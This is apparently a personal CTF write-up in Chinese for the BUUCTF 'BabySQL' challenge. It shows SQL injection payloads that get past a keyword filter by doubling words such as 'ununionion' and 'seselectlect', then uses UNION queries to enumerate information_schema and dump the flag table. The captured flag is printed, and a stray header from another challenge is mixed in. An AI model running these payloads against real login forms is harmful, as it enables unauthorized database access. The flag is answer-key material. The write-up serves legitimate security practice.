[极客大挑战 2019]BabySQL – buu刷题笔记

自从前几次网站被日，我对我的网站做了严格的过滤，你们这些黑客死心吧！！！

尝试登录 admin\'# ，登录成功，但相较于以前做的那个sql题，这个flag铁定错的

[极客大挑战 2019]LoveSQL – buu刷题记录

2022年4月14日 15:39

032415

Your password is \'fd7055ec3060d96f366f2576620868cc\'

尝试万能密码 admin\' or 1=1#，报错，猜测是关键词拦截了，经过一番测试 select,and,or,from,by都被过滤了

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near \'1=1#\' and password=\'123456\'\' at line 1

经过双写之后，成功绕过

admin\' oorr 1=1#

然后就是那些语句一路高歌猛进就好

admin\' oorrder bbyy 4#
admin\' oorrder bbyy 3#
-1\' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
-1\' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=\'ctf\'#
-1\' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=\'Flag\'#
-1\' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#

最终flag为flag{6412beef-25f2-464f-adbf-536b39b50721}